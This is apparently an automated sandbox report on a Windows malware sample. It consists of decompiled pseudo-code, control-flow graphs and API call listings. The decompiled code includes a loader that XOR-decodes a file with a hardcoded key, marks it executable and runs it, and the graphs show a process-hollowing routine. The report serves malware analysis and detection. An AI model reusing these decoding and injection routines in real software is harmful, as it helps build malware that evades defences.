7614->7615 7616 13219df 7615->7616 7618 132199a 7615->7618 7615->7622 7617 13231da __mbsnbcmp_l 64 API calls 7616->7617 7617->7622 7619 13246a3 __locking 68 API calls 7618->7619 7618->7622 7620 1321a3a 7619->7620 7621 13246a3 __locking 68 API calls 7620->7621 7620->7622 7621->7622 7622->7558 7626 1327593 LeaveCriticalSection 7623->7626 7625 132477d 7625->7601 7626->7625 7628 132339e _ftell 2 API calls 7627->7628 7629 1321b26 7628->7629 7629->7053 7631 1321876 _doexit 
7630->7631 7632 13218bf 7631->7632 7633 132188a _memset 7631->7633 7642 13218b4 _doexit 7631->7642 7634 132332b __lock_file 65 API calls 7632->7634 7635 13231da __mbsnbcmp_l 64 API calls 7633->7635 7636 13218c7 7634->7636 7638 13218a4 7635->7638 7643 1321660 7636->7643 7640 1323941 __mbsnbcmp_l 6 API calls 7638->7640 7640->7642 7642->7057 7646 132167e _memset 7643->7646 7649 132169c 7643->7649 7644 1321687 7645 13231da __mbsnbcmp_l 64 API calls 7644->7645 7647 132168c 7645->7647 7646->7644 7646->7649 7655 13216db 7646->7655 7648 1323941 __mbsnbcmp_l 6 API calls 7647->7648 7648->7649 7659 13218f6 7649->7659 7651 13217f9 _memset 7656 13231da __mbsnbcmp_l 64 API calls 7651->7656 7652 1321825 _memset 7657 13231da __mbsnbcmp_l 64 API calls 7652->7657 7653 13242a5 __fileno 64 API calls 7653->7655 7655->7649 7655->7651 7655->7652 7655->7653 7662 13241a8 7655->7662 7692 1323abb 7655->7692 7712 13242d7 7655->7712 7656->7647 7657->7647 7660 132339e _ftell 2 API calls 7659->7660 7661 13218fe 7660->7661 7661->7642 7663 13241b4 _doexit 7662->7663 7664 13241d7 7663->7664 7665 13241bc 7663->7665 7667 13241e5 7664->7667 7671 1324226 7664->7671 7666 13231ed __read_nolock 64 API calls 7665->7666 7669 13241c1 7666->7669 7668 13231ed __read_nolock 64 API calls 7667->7668 7670 13241ea 7668->7670 7672 13231da __mbsnbcmp_l 64 API calls 7669->7672 7673 13231da __mbsnbcmp_l 64 API calls 7670->7673 7674 1324233 7671->7674 7675 1324247 7671->7675 7685 13241c9 _doexit 7672->7685 7677 13241f1 7673->7677 7678 13231ed __read_nolock 64 API calls 7674->7678 7676 13274f3 ___lock_fhandle 65 API calls 7675->7676 7679 132424d 7676->7679 7683 1323941 __mbsnbcmp_l 6 API calls 7677->7683 7680 1324238 7678->7680 7681 1324270 7679->7681 7682 132425a 7679->7682 7684 13231da __mbsnbcmp_l 64 API calls 7680->7684 7687 13231da __mbsnbcmp_l 64 API calls 7681->7687 7724 1323be6 7682->7724 7683->7685 7684->7677 7685->7655 7689 1324275 7687->7689 7688 1324268 7793 132429b 7688->7793 7690 13231ed __read_nolock 64 

                            Control-flow Graph

                            C-Code - Quality: 44%
                            			E01321210(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a12) {
                            				signed int _v12;
                            				intOrPtr _v20;
                            				char* _v24;
                            				long _v28;
                            				void* _v32;
                            				long _v36;
                            				void* __ebp;
                            				intOrPtr _t35;
                            				long _t37;
                            				void* _t40;
                            
                            				_v12 = 0;
                            				_v28 = 0;
                            				_v24 = "248058040134";
                            				_t35 = E01321649(_a12, 0x13300f8); // executed
                            				_v20 = _t35;
                            				_push(2);
                            				_push(0);
                            				_push(_v20); // executed
                            				E01321BB2(__ebx, __edx, __edi, __esi, __eflags); // executed
                            				_push(_v20); // executed
                            				_t37 = E01321ABA(__ebx, _v20, __edi, __esi, __eflags); // executed
                            				_v28 = _t37;
                            				_push(0);
                            				_push(0);
                            				_push(_v20); // executed
                            				E01321BB2(__ebx, _v20, __edi, __esi, __eflags); // executed
                            				_t40 = E0132148F(__ebx, _v20, __edi, _v28); // executed
                            				_v32 = _t40;
                            				E01321900(_v32, _v28, 1, _v20); // executed
                            				while(_v12 < _v28) {
                            					asm("cdq");
                            					 *(_v32 + _v12) =  *(_v32 + _v12) & 0x000000ff ^ _v24[_v12 % 0xc] & 0x000000ff;
                            					_v12 = _v12 + 1;
                            				}
                            				VirtualProtect(_v32, _v28, 0x40,  &_v36); // executed
                            				return _v32();
                            			}














                            APIs
                              • Part of subcall function 01321649: __fsopen.LIBCMT ref: 01321656
                            • _fseek.LIBCMT ref: 01321247
                            • _ftell.LIBCMT ref: 01321253
                            • _fseek.LIBCMT ref: 01321266
                              • Part of subcall function 01321BB2: __lock_file.LIBCMT ref: 01321BFD
                              • Part of subcall function 01321BB2: __fseek_nolock.LIBCMT ref: 01321C0D
                            • _malloc.LIBCMT ref: 01321272
                              • Part of subcall function 0132148F: __FF_MSGBANNER.LIBCMT ref: 013214B2
                              • Part of subcall function 0132148F: __NMSG_WRITE.LIBCMT ref: 013214B9
                              • Part of subcall function 0132148F: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0132571C,?,00000001,?,?,01321EEE,00000018,0132D4A0,0000000C,01321F7F), ref: 01321506
                            • __fread_nolock.LIBCMT ref: 0132128B
                            • VirtualProtect.KERNELBASE(?,00000000,00000040,?), ref: 013212D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _fseek$AllocateHeapProtectVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_ftell_malloc
                            • String ID: 248058040134
                            • API String ID: 2202995300-1212554544
                            • Opcode ID: d51fae8fe603ac936a14a94fff12bff750d8c32aca57c406faffb40e1932159c
                            • Instruction ID: f1bfeb3cd10206685e5728230f941454a6bac0d9a4406f8d9f18214ab653cb0d
                            • Opcode Fuzzy Hash: d51fae8fe603ac936a14a94fff12bff750d8c32aca57c406faffb40e1932159c
                            • Instruction Fuzzy Hash: 82217FB1E0021A9FDB04EFD4C881FBFBB75BF94304F144558E611A7240D675AA51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 262 2b131e7-2b132db call 2b1298f call 2b13168 call 2b129a3 * 8 284 2b132e2-2b132f2 262->284 285 2b132dd 262->285 288 2b132f4 284->288 289 2b132f9-2b1331c CreateFileW 284->289 286 2b13840-2b13843 285->286 288->286 290 2b13323-2b13349 VirtualAlloc ReadFile 289->290 291 2b1331e 289->291 292 2b13350-2b13363 290->292 293 2b1334b 290->293 291->286 295 2b13369-2b13825 292->295 296 2b1382a-2b13839 call 2b12b3a 292->296 293->286 299 2b1383b-2b1383d ExitProcess 296->299
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: AllocNumaVirtual
                            • String ID:
                            • API String ID: 4233825816-0
                            • Opcode ID: e2fc9926c0d77a3c79a5ae3bf6f131bafcd861332a03ca146282b38218a9daa9
                            • Instruction ID: 1bb9d2591be88df03d71ee10ee552d84000dc2cfaed09b3d3d341245ae6fed2a
                            • Opcode Fuzzy Hash: e2fc9926c0d77a3c79a5ae3bf6f131bafcd861332a03ca146282b38218a9daa9
                            • Instruction Fuzzy Hash: 40325360D5D2E8ADDF02CBE984507FDBFB05E2A102F0841D6E4E5B6283D13A934EDB25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 353 2b1310a-2b13150 call 2b1298f call 2b129a3 GetSystemInfo 359 2b13152-2b13155 353->359 360 2b13159 353->360 361 2b1315b-2b1315e 359->361 360->361
                            APIs
                            • GetSystemInfo.KERNELBASE(?), ref: 02B13127
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: InfoSystem
                            • String ID:
                            • API String ID: 31276548-0
                            • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                            • Instruction ID: 10711d6acd6258bc5d3053ab86220c849f89c1842c287cb97a36ed9fd8839b8d
                            • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                            • Instruction Fuzzy Hash: B9F0EC71D1410CABDF48E7FC88457BEB7EDD70A200F5046FDDB06D2240E63085908761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,02B140DA,7FAB7E30), ref: 02B1390A
                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040), ref: 02B13934
                            • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000), ref: 02B1394B
                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040), ref: 02B1396D
                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040,?,00000000,0000000E), ref: 02B139DF
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040,?), ref: 02B139EA
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040,?), ref: 02B13A35
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                            • String ID:
                            • API String ID: 656311269-0
                            • Opcode ID: c457d14a0cbd690d6bd0e7763edf856a49aff49a7c87b750f7cc80aa2c616f14
                            • Instruction ID: 76e01d2175e1977b85d642d225c9517e4369f80946b89bf1f3f18be492425738
                            • Opcode Fuzzy Hash: c457d14a0cbd690d6bd0e7763edf856a49aff49a7c87b750f7cc80aa2c616f14
                            • Instruction Fuzzy Hash: 72518F71E10319ABDB109FF8DC84BAEBBB9EF04750F5045A5FA51F7280E7749A008B68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 71 1321660-132167c 72 132167e-1321681 71->72 73 132169f 71->73 72->73 75 1321683-1321685 72->75 74 13216a1-13216a5 73->74 76 13216a6-13216ab 75->76 77 1321687-1321696 call 13231da 75->77 78 13216ba-13216bd 76->78 79 13216ad-13216b8 76->79 89 1321697-132169c call 1323941 77->89 82 13216ca-13216cc 78->82 83 13216bf-13216c7 call 1324360 78->83 79->78 81 13216db-13216ee 79->81 87 13216f0-13216f6 81->87 88 13216f8 81->88 82->77 86 13216ce-13216d9 82->86 83->82 86->77 86->81 91 13216ff-1321701 87->91 88->91 89->73 93 13217f1-13217f4 91->93 94 1321707-132170e 91->94 93->74 96 1321710-1321715 94->96 97 1321754-1321757 94->97 96->97 100 1321717 96->100 98 13217c1-13217c2 call 1323abb 97->98 99 1321759-132175d 97->99 108 13217c7-13217cb 98->108 104 132177e-1321785 99->104 105 132175f-1321768 99->105 101 1321852 100->101 102 132171d-1321721 100->102 111 1321856-132185f 101->111 106 1321723 102->106 107 1321725-1321728 102->107 112 1321787 104->112 113 1321789-132178c 104->113 109 1321773-1321778 105->109 110 132176a-1321771 105->110 106->107 114 13217f9-13217ff 107->114 115 132172e-132174f call 13242d7 107->115 108->111 116 13217d1-13217d5 108->116 117 132177a-132177c 109->117 110->117 111->74 112->113 118 1321792-132179e call 13242a5 call 13241a8 113->118 119 1321825-1321829 113->119 125 1321810-1321820 call 13231da 114->125 126 1321801-132180d call 1324360 114->126 132 13217e9-13217eb 115->132 116->119 124 13217d7-13217e6 116->124 117->113 139 13217a3-13217a8 118->139 122 132183b-132184d call 13231da 119->122 123 132182b-1321838 call 1324360 119->123 122->89 123->122 124->132 125->89 126->125 132->93 132->94 140 1321864-1321868 139->140 141 13217ae-13217b1 139->141 140->111 141->101 142 13217b7-13217bf 141->142 142->132
                            C-Code - Quality: 85%
                            			E01321660(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                            				signed int _v8;
                            				char* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t90;
                            				intOrPtr* _t92;
                            				signed int _t94;
                            				char _t97;
                            				signed int _t105;
                            				void* _t106;
                            				signed int _t107;
                            				signed int _t110;
                            				signed int _t113;
                            				intOrPtr* _t114;
                            				signed int _t118;
                            				signed int _t119;
                            				signed int _t120;
                            				char* _t121;
                            				signed int _t125;
                            				signed int _t131;
                            				signed int _t133;
                            				void* _t134;
                            
                            				_t125 = __edx;
                            				_t121 = _a4;
                            				_t119 = _a8;
                            				_t131 = 0;
                            				_v12 = _t121;
                            				_v8 = _t119;
                            				if(_a12 == 0 || _a16 == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					_t138 = _t121;
                            					if(_t121 != 0) {
                            						_t133 = _a20;
                            						__eflags = _t133;
                            						if(_t133 == 0) {
                            							L9:
                            							__eflags = _t119 - 0xffffffff;
                            							if(_t119 != 0xffffffff) {
                            								_t90 = E01324360(_t131, _t121, _t131, _t119);
                            								_t134 = _t134 + 0xc;
                            							}
                            							__eflags = _t133 - _t131;
                            							if(__eflags == 0) {
                            								goto L3;
                            							} else {
                            								_t94 = _t90 | 0xffffffff;
                            								_t125 = _t94 % _a12;
                            								__eflags = _a16 - _t94 / _a12;
                            								if(__eflags > 0) {
                            									goto L3;
                            								}
                            								L13:
                            								_t131 = _a12 * _a16;
                            								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                            								_v20 = _t131;
                            								_t120 = _t131;
                            								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                            									_v16 = 0x1000;
                            								} else {
                            									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                            								}
                            								__eflags = _t131;
                            								if(_t131 == 0) {
                            									L40:
                            									return _a16;
                            								} else {
                            									do {
                            										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                            										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                            											L24:
                            											__eflags = _t120 - _v16;
                            											if(_t120 < _v16) {
                            												_t97 = E01323ABB(_t120, _t125, _t133); // executed
                            												__eflags = _t97 - 0xffffffff;
                            												if(_t97 == 0xffffffff) {
                            													L48:
                            													return (_t131 - _t120) / _a12;
                            												}
                            												__eflags = _v8;
                            												if(_v8 == 0) {
                            													L44:
                            													__eflags = _a8 - 0xffffffff;
                            													if(__eflags != 0) {
                            														E01324360(_t131, _a4, 0, _a8);
                            														_t134 = _t134 + 0xc;
                            													}
                            													 *((intOrPtr*)(E013231DA(__eflags))) = 0x22;
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													L4:
                            													E01323941(_t125, _t131, _t133);
                            													goto L5;
                            												}
                            												_t123 = _v12;
                            												_v12 = _v12 + 1;
                            												 *_v12 = _t97;
                            												_t120 = _t120 - 1;
                            												_t70 =  &_v8;
                            												 *_t70 = _v8 - 1;
                            												__eflags =  *_t70;
                            												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                            												goto L39;
                            											}
                            											__eflags = _v16;
                            											if(_v16 == 0) {
                            												_t105 = 0x7fffffff;
                            												__eflags = _t120 - 0x7fffffff;
                            												if(_t120 <= 0x7fffffff) {
                            													_t105 = _t120;
                            												}
                            											} else {
                            												__eflags = _t120 - 0x7fffffff;
                            												if(_t120 <= 0x7fffffff) {
                            													_t55 = _t120 % _v16;
                            													__eflags = _t55;
                            													_t125 = _t55;
                            													_t110 = _t120;
                            												} else {
                            													_t125 = 0x7fffffff % _v16;
                            													_t110 = 0x7fffffff;
                            												}
                            												_t105 = _t110 - _t125;
                            											}
                            											__eflags = _t105 - _v8;
                            											if(_t105 > _v8) {
                            												goto L44;
                            											} else {
                            												_push(_t105);
                            												_push(_v12);
                            												_t106 = E013242A5(_t125, _t131, _t133);
                            												_pop(_t123);
                            												_push(_t106); // executed
                            												_t107 = E013241A8(_t120, _t125, _t131, _t133, __eflags); // executed
                            												_t134 = _t134 + 0xc;
                            												__eflags = _t107;
                            												if(_t107 == 0) {
                            													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                            													goto L48;
                            												}
                            												__eflags = _t107 - 0xffffffff;
                            												if(_t107 == 0xffffffff) {
                            													L47:
                            													_t80 = _t133 + 0xc;
                            													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                            													__eflags =  *_t80;
                            													goto L48;
                            												}
                            												_v12 = _v12 + _t107;
                            												_t120 = _t120 - _t107;
                            												_v8 = _v8 - _t107;
                            												goto L39;
                            											}
                            										}
                            										_t113 =  *(_t133 + 4);
                            										__eflags = _t113;
                            										if(__eflags == 0) {
                            											goto L24;
                            										}
                            										if(__eflags < 0) {
                            											goto L47;
                            										}
                            										_t131 = _t120;
                            										__eflags = _t120 - _t113;
                            										if(_t120 >= _t113) {
                            											_t131 = _t113;
                            										}
                            										__eflags = _t131 - _v8;
                            										if(_t131 > _v8) {
                            											_t133 = 0;
                            											__eflags = _a8 - 0xffffffff;
                            											if(__eflags != 0) {
                            												E01324360(_t131, _a4, 0, _a8);
                            												_t134 = _t134 + 0xc;
                            											}
                            											_t114 = E013231DA(__eflags);
                            											_push(_t133);
                            											_push(_t133);
                            											_push(_t133);
                            											_push(_t133);
                            											 *_t114 = 0x22;
                            											_push(_t133);
                            											goto L4;
                            										} else {
                            											E013242D7(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                            											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                            											 *_t133 =  *_t133 + _t131;
                            											_v12 = _v12 + _t131;
                            											_t120 = _t120 - _t131;
                            											_t134 = _t134 + 0x10;
                            											_v8 = _v8 - _t131;
                            											_t131 = _v20;
                            										}
                            										L39:
                            										__eflags = _t120;
                            									} while (_t120 != 0);
                            									goto L40;
                            								}
                            							}
                            						}
                            						_t118 = _t90 | 0xffffffff;
                            						_t90 = _t118 / _a12;
                            						_t125 = _t118 % _a12;
                            						__eflags = _a16 - _t90;
                            						if(_a16 <= _t90) {
                            							goto L13;
                            						}
                            						goto L9;
                            					}
                            					L3:
                            					_t92 = E013231DA(_t138);
                            					_push(_t131);
                            					_push(_t131);
                            					_push(_t131);
                            					_push(_t131);
                            					 *_t92 = 0x16;
                            					_push(_t131);
                            					goto L4;
                            				}
                            			}






























                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction ID: e96bbc068a4b0a272071fa1099359a5fc9f98e34d0fb4b071410f6a255e94334
                            • Opcode Fuzzy Hash: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction Fuzzy Hash: 0D51F831A00229EFDB30BF6D8A4459EBFB9EF91338F188229E92556190D7719951CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 143 2b12b3a-2b12b55 call 2b1298f 146 2b12b58-2b12b5c 143->146 147 2b12b74-2b12b81 146->147 148 2b12b5e-2b12b72 146->148 149 2b12b84-2b12b88 147->149 148->146 150 2b12ba0-2b12bad 149->150 151 2b12b8a-2b12b9e 149->151 152 2b12bb0-2b12bb4 150->152 151->149 153 2b12bb6-2b12bca 152->153 154 2b12bcc-2b12caa call 2b129a3 * 8 152->154 153->152 171 2b12cc1 154->171 172 2b12cac-2b12cb6 154->172 174 2b12cc5-2b12ce1 171->174 172->171 173 2b12cb8-2b12cbf 172->173 173->174 176 2b12ce3-2b12ce5 174->176 177 2b12cea 174->177 178 2b13064-2b13067 176->178 179 2b12cf1-2b12d19 CreateProcessW 177->179 180 2b12d20-2b12d39 GetThreadContext 179->180 181 2b12d1b 179->181 183 2b12d40-2b12d5d ReadProcessMemory 180->183 184 2b12d3b 180->184 182 2b13018-2b1301c 181->182 187 2b13061-2b13063 182->187 188 2b1301e-2b13022 182->188 185 2b12d64-2b12d6d 183->185 186 2b12d5f 183->186 184->182 189 2b12d94-2b12db3 call 2b13c8a 185->189 190 2b12d6f-2b12d7e 185->190 186->182 187->178 191 2b13035-2b13039 188->191 192 2b13024-2b1302f 188->192 202 2b12db5 189->202 203 2b12dba-2b12ddb call 2b13da4 189->203 190->189 195 2b12d80-2b12d8d call 2b13bf5 190->195 193 2b13041-2b13045 191->193 194 2b1303b 191->194 192->191 198 2b13047 193->198 199 2b1304d-2b13051 193->199 194->193 195->189 209 2b12d8f 195->209 198->199 204 2b13053-2b13058 call 2b13bf5 199->204 205 2b1305d-2b1305f 199->205 202->182 211 2b12e20-2b12e40 call 2b13da4 203->211 212 2b12ddd-2b12de4 203->212 204->205 205->178 209->182 219 2b12e42 211->219 220 2b12e47-2b12e5c call 2b12a0a 211->220 213 2b12de6-2b12e12 call 2b13da4 212->213 214 2b12e1b 212->214 222 2b12e14 213->222 223 2b12e19 213->223 214->182 219->182 225 2b12e65-2b12e6f 220->225 222->182 223->211 226 2b12ea1-2b12ea5 225->226 227 2b12e71-2b12e9f call 2b12a0a 225->227 229 2b12f85-2b12fa1 call 2b13a43 226->229 230 2b12eab-2b12eb9 226->230 227->225 237 2b12fa3 229->237 238 2b12fa5-2b12fc6 SetThreadContext 229->238 230->229 233 2b12ebf-2b12ecd 230->233 
233->229 236 2b12ed3-2b12ef3 233->236 239 2b12ef6-2b12efa 236->239 237->182 240 2b12fc8 238->240 241 2b12fca-2b12fd4 call 2b13b44 238->241 239->229 242 2b12f00-2b12f15 239->242 240->182 250 2b12fd6 241->250 251 2b12fd8-2b12fdc 241->251 244 2b12f27-2b12f2b 242->244 245 2b12f68-2b12f80 244->245 246 2b12f2d-2b12f39 244->246 245->239 248 2b12f66 246->248 249 2b12f3b-2b12f64 246->249 248->244 249->248 250->182 253 2b12fe4-2b12fe8 251->253 254 2b12fde 251->254 255 2b12ff0-2b12ff4 253->255 256 2b12fea 253->256 254->253 257 2b12ff6 255->257 258 2b12ffc-2b13000 255->258 256->255 257->258 259 2b13002-2b13007 call 2b13bf5 258->259 260 2b1300c-2b13012 258->260 259->260 260->179 260->182
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID: D
                            • API String ID: 0-2746444292
                            • Opcode ID: 334a5c2d189ad3abc6f52fa122c8db01a1a36913681fbc78ae2c7aca0212d8e4
                            • Instruction ID: 113ab9e37a9111916f893b8c0a9f5f3c8a31f63490c8e50934448eaddb627a9a
                            • Opcode Fuzzy Hash: 334a5c2d189ad3abc6f52fa122c8db01a1a36913681fbc78ae2c7aca0212d8e4
                            • Instruction Fuzzy Hash: 0B02D170E00219EFDB24DF98C985BADBBF5FF08305F6040A9E915BA291D7749A84DF10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 300 1322c4c-1322c60 301 1322c67-1322c6e 300->301 302 1322c72-1322c7b 301->302 303 1322c70-1322c71 301->303
                            C-Code - Quality: 100%
                            			E01322C4C(intOrPtr _a4) {
                            				void* _t6;
                            
                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                            				 *0x1330264 = _t6;
                            				if(_t6 != 0) {
                            					 *0x1331cbc = 1;
                            					return 1;
                            				} else {
                            					return _t6;
                            				}
                            			}





                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 01322C61
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID: Thv
                            • API String ID: 10892065-1420341948
                            • Opcode ID: 4d89a5829cfba90ededb10c243ecd261b3e04712cbb8ce7d90705cdfae067506
                            • Instruction ID: 090cc1497820f47c811a181454f4c0d508010efb462e714d514cc333b3b04d4d
                            • Opcode Fuzzy Hash: 4d89a5829cfba90ededb10c243ecd261b3e04712cbb8ce7d90705cdfae067506
                            • Instruction Fuzzy Hash: C8D05E765947099ADB216EB5AC087273BDC9384395F00C43AF80DC6144E9B4C540CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 304 132186a-132187e call 1322a5c 307 1321880-1321883 304->307 308 13218b7 304->308 307->308 310 1321885-1321888 307->310 309 13218b9-13218be call 1322aa1 308->309 311 132188a-132188e 310->311 312 13218bf-13218da call 132332b call 1321660 310->312 314 1321890-132189c call 1324360 311->314 315 132189f-13218b4 call 13231da call 1323941 311->315 324 13218df-13218f4 call 13218f6 312->324 314->315 315->308 324->309
                            C-Code - Quality: 70%
                            			E0132186A(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t19;
                            				intOrPtr _t22;
                            				void* _t33;
                            				void* _t34;
                            
                            				_t30 = __edi;
                            				_t29 = __edx;
                            				_push(0xc);
                            				_push(0x132d418);
                            				E01322A5C(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                            				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                            					L6:
                            					_t19 = 0;
                            				} else {
                            					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                            						E0132332B( *((intOrPtr*)(_t33 + 0x18)));
                            						 *((intOrPtr*)(_t33 - 4)) = 0;
                            						_t22 = E01321660(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                            						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                            						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                            						E013218F6();
                            						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                            					} else {
                            						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                            						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                            							E01324360(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                            							_t34 = _t34 + 0xc;
                            						}
                            						 *((intOrPtr*)(E013231DA(_t41))) = 0x16;
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E01323941(_t29, _t30, 0);
                            						goto L6;
                            					}
                            				}
                            				return E01322AA1(_t19);
                            			}








                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
